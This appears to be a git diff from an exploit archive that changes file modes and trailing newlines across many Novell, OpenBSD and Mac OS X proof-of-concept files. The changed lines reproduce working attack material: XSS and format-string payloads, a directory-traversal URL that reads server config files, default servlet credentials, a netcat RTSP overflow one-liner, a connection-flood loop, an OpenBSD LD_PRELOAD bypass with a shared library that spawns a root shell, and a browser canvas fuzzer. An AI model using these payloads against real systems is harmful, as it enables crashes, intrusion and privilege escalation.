b/platforms/novell/dos/33183.html @@ -6,4 +6,4 @@ A successful attack allows a remote attacker to crash an application that is usi Novell Client 4.91.5.1 is vulnerable; other versions may also be affected. -<html><body> <object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object> </body></html> \ No newline at end of file +<html><body> <object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object> </body></html> \ No newline at end of file diff --git a/platforms/novell/dos/33184.html b/platforms/novell/dos/33184.html old mode 100755 new mode 100644 index 944e6d798..551f8c74a --- a/platforms/novell/dos/33184.html +++ b/platforms/novell/dos/33184.html @@ -6,4 +6,4 @@ A successful attack allows a remote attacker to crash an application that is usi Novell Client 4.91.5.1 is vulnerable; other versions may also be affected. -<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html> \ No newline at end of file +<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html> \ No newline at end of file diff --git a/platforms/novell/remote/1679.pm b/platforms/novell/remote/1679.pm old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/19682.txt b/platforms/novell/remote/19682.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/20482.txt b/platforms/novell/remote/20482.txt old mode 100755 new mode 100644 index d57ec9b70..9c58221a9 --- a/platforms/novell/remote/20482.txt +++ b/platforms/novell/remote/20482.txt @@ -4,4 +4,4 @@ Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scrip http://victim.host/perl/files.pl?file=sys:system/autoexec.ncf http://victim.host/perl/files.pl?file=sys:etc/ldremote.ncf -http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc \ No newline at end of file +http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc \ No newline at end of file diff --git a/platforms/novell/remote/21182.txt b/platforms/novell/remote/21182.txt old mode 100755 new mode 100644 index 6ea2b4bae..1cd3f1a85 --- a/platforms/novell/remote/21182.txt +++ b/platforms/novell/remote/21182.txt @@ -6,4 +6,4 @@ A remote attacker may gain access to the Servlet Manager interface by entering t http://server/servlet/ServletManager username servlet -password manager \ No newline at end of file +password manager \ No newline at end of file diff --git a/platforms/novell/remote/21488.txt b/platforms/novell/remote/21488.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/28836.c b/platforms/novell/remote/28836.c old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/29400.txt b/platforms/novell/remote/29400.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/29699.txt b/platforms/novell/remote/29699.txt old mode 100755 new mode 100644 index 39b7c62e3..92549ec4c --- a/platforms/novell/remote/29699.txt +++ b/platforms/novell/remote/29699.txt @@ -16,4 +16,4 @@ protocol :tcp action :allow }; -The above example demonstrates how an attacker would allow their client machine HTTP access to any host on the remote network. \ No newline at end of file +The above example demonstrates how an attacker would allow their client machine HTTP access to any host on the remote network. \ No newline at end of file diff --git a/platforms/novell/remote/30432.txt b/platforms/novell/remote/30432.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/31095.txt b/platforms/novell/remote/31095.txt old mode 100755 new mode 100644 index fe2750471..c8b8a16b6 --- a/platforms/novell/remote/31095.txt +++ b/platforms/novell/remote/31095.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to perform cross-site scripting at Novell GroupWise WebAccess 7 is vulnerable; other versions may also be affected. http://www.example.com/servlet/webacc?Error=[XSS] -http://www.example.com/servlet/webacc?User.html=[XSS] \ No newline at end of file +http://www.example.com/servlet/webacc?User.html=[XSS] \ No newline at end of file diff --git a/platforms/novell/remote/31533.txt b/platforms/novell/remote/31533.txt old mode 100755 new mode 100644 index 17e743d0e..137fb7b78 --- a/platforms/novell/remote/31533.txt +++ b/platforms/novell/remote/31533.txt @@ -7,4 +7,4 @@ Unauthenticated attackers can exploit this issue. This issue affects eDirectory 8.8 (and earlier) as well as 8.7.3.9 (and earlier). java -cp eMBoxClient.jar embox -i -login -s edir_ip_address -p port (port can be 8008, 8009, 80, 443, 8030) \ No newline at end of file +login -s edir_ip_address -p port (port can be 8008, 8009, 80, 443, 8030) \ No newline at end of file diff --git a/platforms/novell/remote/32795.txt b/platforms/novell/remote/32795.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/remote/32876.txt b/platforms/novell/remote/32876.txt old mode 100755 new mode 100644 index 1dff1b862..3e58add15 --- a/platforms/novell/remote/32876.txt +++ b/platforms/novell/remote/32876.txt @@ -28,4 +28,4 @@ Denial of service: Information disclosure: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->< -/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> \ No newline at end of file +/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> \ No newline at end of file diff --git a/platforms/novell/webapps/10074.txt b/platforms/novell/webapps/10074.txt old mode 100755 new mode 100644 diff --git a/platforms/novell/webapps/10075.txt b/platforms/novell/webapps/10075.txt old mode 100755 new mode 100644 diff --git a/platforms/openbsd/dos/20271.c b/platforms/openbsd/dos/20271.c old mode 100755 new mode 100644 index 662f323a5..06e610cf7 --- a/platforms/openbsd/dos/20271.c +++ b/platforms/openbsd/dos/20271.c @@ -332,4 +332,4 @@ main(int argc, char *argv[]) printf("done. Try an endless loop if box is still alive.\n"); return(0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/openbsd/dos/21167.c b/platforms/openbsd/dos/21167.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/dos/23339.c b/platforms/openbsd/dos/23339.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/dos/23389.c b/platforms/openbsd/dos/23389.c old mode 100755 new mode 100644 index 6545d6827..eaa8e2632 --- a/platforms/openbsd/dos/23389.c +++ b/platforms/openbsd/dos/23389.c @@ -13,4 +13,4 @@ int main () unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1; return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0)); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/openbsd/dos/23392.c b/platforms/openbsd/dos/23392.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/dos/41278.txt b/platforms/openbsd/dos/41278.txt old mode 100755 new mode 100644 diff --git a/platforms/openbsd/dos/8406.txt b/platforms/openbsd/dos/8406.txt old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/20256.c b/platforms/openbsd/local/20256.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/21373.c b/platforms/openbsd/local/21373.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/22210.txt b/platforms/openbsd/local/22210.txt old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/23046.c b/platforms/openbsd/local/23046.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/23047.c b/platforms/openbsd/local/23047.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/29102.c b/platforms/openbsd/local/29102.c old mode 100755 new mode 100644 index 7aefb125b..e3fe5f7b3 --- a/platforms/openbsd/local/29102.c +++ b/platforms/openbsd/local/29102.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/21188/info OpenBSD is prone to a local vulnerability that may allow attackers to pass malicious environment variables to applications, bypassing expected security restrictions. @@ -5,36 +6,37 @@ OpenBSD is prone to a local vulnerability that may allow attackers to pass malic Attackers may be able to exploit this issue to execute arbitrary code with elevated privileges. This issue affects OpenBSD 3.9 and 4.0; prior versions may also be affected. +*/ - Example Code - ------------- - vulnerable root-suid program example: +// Example Code +// ------------- +// vulnerable root-suid program example: - main() - { +main() +{ setuid(0); execl("/usr/bin/id","id",0); - } +} - evil shared library: +// evil shared library: - __attribute__ ((constructor)) main() - { +__attribute__ ((constructor)) main() +{ printf("[+] Hello from shared library land\n"); execle("/bin/sh","sh",0,0); - } +} - openbsd _dl_unsetenv bypass: +// openbsd _dl_unsetenv bypass: - #define LIB "LD_PRELOAD=/tmp/lib.so" - main(int argc, char *argv[]) - { +#define LIB "LD_PRELOAD=/tmp/lib.so" +main(int argc, char *argv[]) +{ char *e[] = { LIB, LIB, 0 }; int i; for(i = 0; argv[i]; argv[i] = argv[++i]); /* inspired by _dl_unsetenv (: */ execve(argv[0], argv, e); - } \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/openbsd/local/42271.c b/platforms/openbsd/local/42271.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/local/5979.c b/platforms/openbsd/local/5979.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/remote/20733.c b/platforms/openbsd/remote/20733.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd/remote/22858.txt b/platforms/openbsd/remote/22858.txt old mode 100755 new mode 100644 diff --git a/platforms/openbsd_x86/shellcode/13475.c b/platforms/openbsd_x86/shellcode/13475.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd_x86/shellcode/13476.c b/platforms/openbsd_x86/shellcode/13476.c old mode 100755 new mode 100644 diff --git a/platforms/openbsd_x86/shellcode/13477.c b/platforms/openbsd_x86/shellcode/13477.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/12375.c b/platforms/osx/dos/12375.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/12508.html b/platforms/osx/dos/12508.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/12509.html b/platforms/osx/dos/12509.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/15212.txt b/platforms/osx/dos/15212.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/15491.txt b/platforms/osx/dos/15491.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/1712.html b/platforms/osx/dos/1712.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/1715.html b/platforms/osx/dos/1715.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/17567.txt b/platforms/osx/dos/17567.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/17901.c b/platforms/osx/dos/17901.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/20844.txt b/platforms/osx/dos/20844.txt old mode 100755 new mode 100644 index d0f739cf0..0c70aa9dd --- a/platforms/osx/dos/20844.txt +++ b/platforms/osx/dos/20844.txt @@ -7,4 +7,4 @@ A user may craft a URL which contains excess characters to cause the file-sharin The file sharing system must then be restarted to regain its functionality once again. -http://fileserver/?aaaaaaaaa... [approx. 6000 characters] \ No newline at end of file +http://fileserver/?aaaaaaaaa... [approx. 6000 characters] \ No newline at end of file diff --git a/platforms/osx/dos/20845.txt b/platforms/osx/dos/20845.txt old mode 100755 new mode 100644 index e1aec57e8..b238cf464 --- a/platforms/osx/dos/20845.txt +++ b/platforms/osx/dos/20845.txt @@ -11,4 +11,4 @@ pass anonymous mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -aaaaaaaa \ No newline at end of file +aaaaaaaa \ No newline at end of file diff --git a/platforms/osx/dos/20922.txt b/platforms/osx/dos/20922.txt old mode 100755 new mode 100644 index 95aa1cd29..cd2e46790 --- a/platforms/osx/dos/20922.txt +++ b/platforms/osx/dos/20922.txt @@ -6,4 +6,4 @@ Rumpus FTP is prone to a denial of service. An ftp user can engage the attack by It is required that a user be logged in to carry out this attack. It may be possible for remote users to exploit this vulnerability, but authentication is required and anonymous ftp access does not grant users the privileges neccesary to create directories. -Executing command 'mkdir A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A' will make Rumpus quit. \ No newline at end of file +Executing command 'mkdir A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A:A' will make Rumpus quit. \ No newline at end of file diff --git a/platforms/osx/dos/21234.sh b/platforms/osx/dos/21234.sh index 70165f5b3..f4eec0abc 100755 --- a/platforms/osx/dos/21234.sh +++ b/platforms/osx/dos/21234.sh @@ -8,4 +8,4 @@ A vulnerability exists in some versions of Timbuktu. If a large number of connec while: do telnet tb2.host.com 1417 & -done \ No newline at end of file +done \ No newline at end of file diff --git a/platforms/osx/dos/21275.c b/platforms/osx/dos/21275.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/22074.txt b/platforms/osx/dos/22074.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/22483.c b/platforms/osx/dos/22483.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/22629.txt b/platforms/osx/dos/22629.txt old mode 100755 new mode 100644 index fb6051fa4..e1309ca1f --- a/platforms/osx/dos/22629.txt +++ b/platforms/osx/dos/22629.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Apple QuickTime/Darwin Streaming Server. T Although it has not been confirmed, it is speculated that this issue may be exploitable to corrupt memory. -$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n","A"x8192' | nc -v localhost 554 \ No newline at end of file +$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n","A"x8192' | nc -v localhost 554 \ No newline at end of file diff --git a/platforms/osx/dos/23442.txt b/platforms/osx/dos/23442.txt old mode 100755 new mode 100644 index 432ce69be..4d6b73679 --- a/platforms/osx/dos/23442.txt +++ b/platforms/osx/dos/23442.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9228/info The cd9660.util utility has been reported prone to a local buffer overrun vulnerability. Excessive data supplied as an argument for the probe for mounting switch, passed to the cd9660.util utility will overrun the bounds of a reserved buffer in memory. Because memory adjacent to this buffer has been reported to contain saved values that are crucial to controlling execution flow, a local attacker may potentially influence cd9660.util execution flow into attacker-supplied instructions. -./cd9660.util -p `perl -e "print 'A'x512"` \ No newline at end of file +./cd9660.util -p `perl -e "print 'A'x512"` \ No newline at end of file diff --git a/platforms/osx/dos/23505.c b/platforms/osx/dos/23505.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/23793.txt b/platforms/osx/dos/23793.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/24780.html b/platforms/osx/dos/24780.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/24843.txt b/platforms/osx/dos/24843.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/25974.txt b/platforms/osx/dos/25974.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/26128.html b/platforms/osx/dos/26128.html old mode 100755 new mode 100644 index 5846d55e2..e31ea61f7 --- a/platforms/osx/dos/26128.html +++ b/platforms/osx/dos/26128.html @@ -24,4 +24,4 @@ document.write(seconds); </script> <body onLoad="tickTock();"> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/osx/dos/26271.txt b/platforms/osx/dos/26271.txt old mode 100755 new mode 100644 index aa3100e4f..ad9714497 --- a/platforms/osx/dos/26271.txt +++ b/platforms/osx/dos/26271.txt @@ -5,4 +5,4 @@ Apple Safari is prone to a memory corruption vulnerability. This issue is expose Though unconfirmed, this vulnerability could be exploitable to execute arbitrary code. data://<h1>crash</h1> -data://<h>/< \ No newline at end of file +data://<h>/< \ No newline at end of file diff --git a/platforms/osx/dos/26292.html b/platforms/osx/dos/26292.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/26971.txt b/platforms/osx/dos/26971.txt old mode 100755 new mode 100644 index 9d33e26fe..f92c2c6cc --- a/platforms/osx/dos/26971.txt +++ b/platforms/osx/dos/26971.txt @@ -10,4 +10,4 @@ Mac OS X 10.4.3 and prior, TextEdit, and Safari 2.0.2 and prior are vulnerable t <" > onLoad=() STYLE= <SPAN= STYLE= > -<TD STYLE=^ ROWSPAN=1234567890 > \ No newline at end of file +<TD STYLE=^ ROWSPAN=1234567890 > \ No newline at end of file diff --git a/platforms/osx/dos/27714.txt b/platforms/osx/dos/27714.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/27715.txt b/platforms/osx/dos/27715.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/27790.txt b/platforms/osx/dos/27790.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/28165.html b/platforms/osx/dos/28165.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/28521.txt b/platforms/osx/dos/28521.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/28578.txt b/platforms/osx/dos/28578.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/28811.txt b/platforms/osx/dos/28811.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/28948.c b/platforms/osx/dos/28948.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29007.html b/platforms/osx/dos/29007.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29144.txt b/platforms/osx/dos/29144.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29161.txt b/platforms/osx/dos/29161.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29441.txt b/platforms/osx/dos/29441.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29452.txt b/platforms/osx/dos/29452.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29454.txt b/platforms/osx/dos/29454.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29461.txt b/platforms/osx/dos/29461.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29509.txt b/platforms/osx/dos/29509.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29523.txt b/platforms/osx/dos/29523.txt old mode 100755 new mode 100644 index 9eb364760..771819fdb --- a/platforms/osx/dos/29523.txt +++ b/platforms/osx/dos/29523.txt @@ -7,4 +7,4 @@ This issue presents itself because the application fails to properly sanitize us A successful attack may crash the application or possibly lead to arbitrary code execution. This may facilitate unauthorized access or privilege escalation in the context of the user running the application. $ touch %x.%x.%x.%x.%x.%x.%x.swutmp -$ open %x.%x.%x.%x.%x.%x.%x.swutmp \ No newline at end of file +$ open %x.%x.%x.%x.%x.%x.%x.swutmp \ No newline at end of file diff --git a/platforms/osx/dos/29532.txt b/platforms/osx/dos/29532.txt old mode 100755 new mode 100644 index 5c30c4e75..c5f8d2324 --- a/platforms/osx/dos/29532.txt +++ b/platforms/osx/dos/29532.txt @@ -7,4 +7,4 @@ A successful attack may crash the application or possibly allow the attacker to Apple Installer Version 2.1.5 on Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. $ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg -$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg \ No newline at end of file +$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg \ No newline at end of file diff --git a/platforms/osx/dos/29535.txt b/platforms/osx/dos/29535.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29551.txt b/platforms/osx/dos/29551.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29553.txt b/platforms/osx/dos/29553.txt old mode 100755 new mode 100644 index 856378ebb..aea6de871 --- a/platforms/osx/dos/29553.txt +++ b/platforms/osx/dos/29553.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow attacker-supplied data to be written to arbitr Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. touch %n%n%n%n%n%n%n%n%n%n%n.help -open %n%n%n%n%n%n%n%n%n%n%n.help \ No newline at end of file +open %n%n%n%n%n%n%n%n%n%n%n.help \ No newline at end of file diff --git a/platforms/osx/dos/29554.txt b/platforms/osx/dos/29554.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/29555.txt b/platforms/osx/dos/29555.txt old mode 100755 new mode 100644 index 82e34e59d..7739f3fbf --- a/platforms/osx/dos/29555.txt +++ b/platforms/osx/dos/29555.txt @@ -8,4 +8,4 @@ Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported <script> window.console.log('%n%n%nOh it takes a montage%n%n%n') -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/osx/dos/29616.xml b/platforms/osx/dos/29616.xml old mode 100755 new mode 100644 index 3eaab1327..c720d09e7 --- a/platforms/osx/dos/29616.xml +++ b/platforms/osx/dos/29616.xml @@ -9,4 +9,4 @@ Apple iTunes version 7.0.2 for Intel and PowerPC are vulnerable to this issue; o <?die with your boots on?> <kb:station_record> <kb:station_url_record> -</kb:station_url_record> \ No newline at end of file +</kb:station_url_record> \ No newline at end of file diff --git a/platforms/osx/dos/29620.txt b/platforms/osx/dos/29620.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/3098.html b/platforms/osx/dos/3098.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/31021.html b/platforms/osx/dos/31021.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/3130.c b/platforms/osx/dos/3130.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/3160.html b/platforms/osx/dos/3160.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/31619.ics b/platforms/osx/dos/31619.ics old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/31620.ics b/platforms/osx/dos/31620.ics old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/3166.html b/platforms/osx/dos/3166.html old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/3167.c b/platforms/osx/dos/3167.c old mode 100755 new mode 100644 diff --git a/platforms/osx/dos/32136.html b/platforms/osx/dos/32136.html old mode 100755 new mode 100644 index 7ddef7dd9..86daeda5e --- a/platforms/osx/dos/32136.html +++ b/platforms/osx/dos/32136.html @@ -13,4 +13,4 @@ Mac OS X Server v10.5.4 and prior NOTE: These issues were previously covered in BID 30483 (Apple Mac OS X 2008-005 Multiple Security Vulnerabilities), but have been given their own record to better document them. -<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> \ No newline at end of file +<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) 